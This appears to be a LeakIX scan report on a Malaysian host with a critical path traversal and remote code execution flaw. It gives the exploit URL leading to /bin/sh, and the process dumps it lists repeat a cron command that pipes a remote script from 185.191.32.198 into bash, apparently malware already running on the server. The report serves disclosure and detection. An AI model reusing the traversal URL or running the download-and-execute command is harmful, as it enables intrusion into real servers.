LeakIX - Host 124.217.251.187

Host 124.217.251.187

Malaysia

Shinjiru Technology Sdn Bhd

Detected HTTP traversal vulnerability

An attacker can make use of this vulnerability to step out of the root directory and access other parts of the file system.

This might give the attacker the ability to view restricted files, which could provide the attacker with more information required to further compromise the system.

https://www.acunetix.com/websitesecurity/directory-traversal/

IP: 124.217.251.187
Port: 443
URL: https://124.217.251.187/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh

First seen 2022-10-15 23:20
Last seen 2022-11-13 19:29
Open for 28 days

Severity: critical
Fingerprint: ac4d53c4832b249150c23ad350c23ad364690d9464690d94913847569d066a81

Found processes trough traversal RCE:

/usr/lib/systemd/systemd�--switched-root�--system�--deserialize�22�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�




/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/local/cpanel/3rdparty/perl/532/bin/perl�-t -w�/usr/local/cpanel/3rdparty/bin/spamd�--allowed-ips=127.0.0.1,::1�--max-children=5�--pidfile=/var/run/spamd.pid�--listen=5�--listen=6�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
dovecot/pop3-login�
dovecot/imap-login�
dovecot/log�
dovecot/pop3-login�
dovecot/imap-login�
dovecot/config�
dovecot/stats�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/opt/cpanel/ea-php72/root/usr/bin/php�/home/bk8idrofficial/indonesianewscenter.com/l.php�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/bin/python2�-es�/usr/sbin/tuned�-l�-p�
/usr/sbin/sshd�-d�
/usr/sbin/pdns_server�--guardian=no�--daemon=no�--disable-syslog�--log-timestamp=no�--write-pid=no�
cpsrvd (ssl) - waiting for connections                    
/usr/sbin/rsyslogd�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
pure-ftpd (server)��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�sleep $((1 + random % 5))h $((1 + random % 60))m; /usr/local/bin/wp-toolkit update-configuration > /dev/null 2> /dev/null || /usr/local/cpanel/3rdparty/wp-toolkit/bin/wp-toolkit-installer.sh --generate-configs > /dev/null 2> /dev/null; /usr/bin/yum -y update wp-toolkit-cpanel > /dev/null 2> /dev/null�
sleep�4h�17m�
cpdavd - accepting connections on: 2079, 2080, 2090, 2091, 2077, 2078 (dormant)
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
dnsadmin - dormant mode
cpgreylistd - processor
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
cpanellogd - sleeping for logs
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
php-fpm: master process (/usr/local/cpanel/etc/php-fpm.conf)�������������������������
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�

bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
dovecot/auth�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
spamd child
spamd child
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
sw-engine-fpm: master process (/etc/sw-engine/sw-engine-fpm.conf)����������������������������������������������������������������������������������

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�


/usr/bin/sw-engine�/usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script�background-tasks-executor.php�
/usr/bin/sw-engine�/usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script�scheduled-tasks-executor.php�
/opt/cpanel/ea-php72/root/usr/bin/php�/home/gentingd/maxevo88.com/l.php�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�

/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/bin/sh�
/usr/sbin/crond�-n�
/bin/sh�-c�/usr/local/cpanel/3rdparty/bin/php -d disable_functions="" /usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php >> /dev/null 2>&1�
/usr/local/cpanel/3rdparty/bin/php�-d�disable_functions=�/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php�

/usr/sbin/mysqld�--daemonize�--pid-file=/var/run/mysqld/mysqld.pid�


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
lfd - sleeping





/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�











/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�




/usr/lib/systemd/systemd-journald�

bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/local/cpanel/bin/splitlogs�--dir=/etc/apache2/logs/domlogs�--main=vps.bolaking88.net�--suffix=-bytes_log�
/usr/local/cpanel/bin/splitlogs�--dir=/etc/apache2/logs/domlogs�--main=vps.bolaking88.net�--mainout=/etc/apache2/logs/access_log�
/usr/local/cpanel/3rdparty/bin/perl�/usr/local/cpanel/bin/leechprotect�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�

bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�






queueprocd - waiting up to 60s to process a task
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/lib/systemd/systemd-udevd�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/sbin/auditd�
tailwatchd



/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/exim�-ps�-bd�-q1h�-op�/var/spool/exim/exim-daemon.pid�
/usr/sbin/dovecot�-f�-c�/etc/dovecot/dovecot.conf�
dovecot/anvil�
/usr/sbin/nscd�
/usr/sbin/smartd�-n�-q�never�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/pure-authd�-s�/var/run/ftpd.sock�-r�/usr/local/cpanel/bin/pureauth�
/usr/sbin/anacron�-s�
/usr/sbin/httpd�-k�start�
/usr/sbin/irqbalance�--foreground�
/usr/sbin/chronyd�
/sbin/rpcbind�-w�
/usr/lib/polkit-1/polkitd�--no-debug�
/usr/lib/systemd/systemd-logind�
/usr/bin/dbus-daemon�--system�--address=systemd:�--nofork�--nopidfile�--systemd-activation�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/atd�-f�
/usr/sbin/crond�-n�
/sbin/agetty�--noclear�tty1�linux�



/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
bash�


./cron.php�-e0.0.0.0�-p59791�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
cat�/proc/self/cmdline�

Found on 2022-11-13 19:29

Severity: critical
Fingerprint: ac4d53c4832b249150c23ad350c23ad364690d9464690d9491384756087bba1a

Found processes trough traversal RCE:

/usr/lib/systemd/systemd�--switched-root�--system�--deserialize�22�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/opt/cpanel/ea-php72/root/usr/bin/php�/home/bk8idrofficial/optimizaresite.org/l.php�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/bin/python2�-es�/usr/sbin/tuned�-l�-p�
/usr/sbin/crond�-n�
/usr/sbin/sshd�-d�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/pdns_server�--guardian=no�--daemon=no�--disable-syslog�--log-timestamp=no�--write-pid=no�
cpsrvd (ssl) - waiting for connections                    
/usr/sbin/rsyslogd�-n�
pure-ftpd (server)��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
cpdavd - accepting connections on: 2079, 2080, 2090, 2091, 2077, 2078
/usr/local/cpanel/bin/splitlogs�--dir=/etc/apache2/logs/domlogs�--main=vps.bolaking88.net�--suffix=-bytes_log�
/usr/local/cpanel/bin/splitlogs�--dir=/etc/apache2/logs/domlogs�--main=vps.bolaking88.net�--mainout=/etc/apache2/logs/access_log�
/usr/local/cpanel/3rdparty/bin/perl�/usr/local/cpanel/bin/leechprotect�
dnsadmin - dormant mode

cpgreylistd - processor
cpanellogd - sleeping for logs
php-fpm: master process (/usr/local/cpanel/etc/php-fpm.conf)�������������������������

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
spamd child
spamd child
sw-engine-fpm: master process (/etc/sw-engine/sw-engine-fpm.conf)����������������������������������������������������������������������������������
/opt/cpanel/ea-php72/root/usr/bin/php�/home/gentingd/showmeyourbadge.com/l.php�

/opt/cpanel/ea-php72/root/usr/bin/php�/home/gentingd/viralchan.com/l.php�
/opt/cpanel/ea-php72/root/usr/bin/php�/home/gentingd/viralchamnews.com/l.php�
/usr/bin/sw-engine�/usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script�background-tasks-executor.php�
/usr/bin/sw-engine�/usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script�scheduled-tasks-executor.php�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/usr/sbin/crond�-n�
/bin/sh�-c�/usr/local/cpanel/3rdparty/bin/php -d disable_functions="" /usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php >> /dev/null 2>&1�
/usr/local/cpanel/3rdparty/bin/php�-d�disable_functions=�/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/mysqld�--daemonize�--pid-file=/var/run/mysqld/mysqld.pid�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/local/cpanel/3rdparty/perl/532/bin/perl�-t -w�/usr/local/cpanel/3rdparty/bin/spamd�--allowed-ips=127.0.0.1,::1�--max-children=5�--pidfile=/var/run/spamd.pid�--listen=5�--listen=6�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
dovecot/auth�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/httpd�-k�start�


/usr/sbin/httpd�-k�start�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�

/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�


/usr/sbin/httpd�-k�start�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
dovecot/pop3-login�
bash�
dovecot/imap-login�
dovecot/log�
dovecot/pop3-login�
dovecot/imap-login�
dovecot/config�
dovecot/stats�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/usr/sbin/httpd�-k�start�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/opt/cpanel/ea-php72/root/usr/bin/php-cgi�
/bin/sh�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�



/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�




/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/lib/systemd/systemd-journald�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�





/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
/usr/sbin/anacron�-s�

queueprocd - waiting up to 60s to process a task


/usr/lib/systemd/systemd-udevd�
/sbin/auditd�
tailwatchd



/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/exim�-ps�-bd�-q1h�-op�/var/spool/exim/exim-daemon.pid�
/usr/sbin/dovecot�-f�-c�/etc/dovecot/dovecot.conf�
dovecot/anvil�
/usr/sbin/nscd�
/usr/sbin/smartd�-n�-q�never�
/usr/sbin/pure-authd�-s�/var/run/ftpd.sock�-r�/usr/local/cpanel/bin/pureauth�
/usr/sbin/httpd�-k�start�
/usr/sbin/irqbalance�--foreground�
/usr/sbin/chronyd�
/sbin/rpcbind�-w�
/usr/lib/polkit-1/polkitd�--no-debug�
/usr/lib/systemd/systemd-logind�
/usr/bin/dbus-daemon�--system�--address=systemd:�--nofork�--nopidfile�--systemd-activation�


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/atd�-f�
/usr/sbin/crond�-n�
/sbin/agetty�--noclear�tty1�linux�





/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


/usr/sbin/crond�-n�

/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�


lfd - sleeping


/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�

/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
/usr/sbin/crond�-n�
/bin/sh�-c�wget -q -o - http://185.191.32.198/ap.sh | bash > /dev/null 2>&1�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
wget�-q�-o�-�http://185.191.32.198/ap.sh�
bash�
cat�/proc/self/cmdline�

Found on 2022-10-18 19:27

Severity: critical
Fingerprint: ac4d53c4832b249150c23ad350c23ad364690d9464690d949138475664ab8f51

Found processes trough traversal RCE:

/usr/lib/systemd/systemd�--switched-root�--system�--deserialize�22�

/usr/sbin/crond�-n�
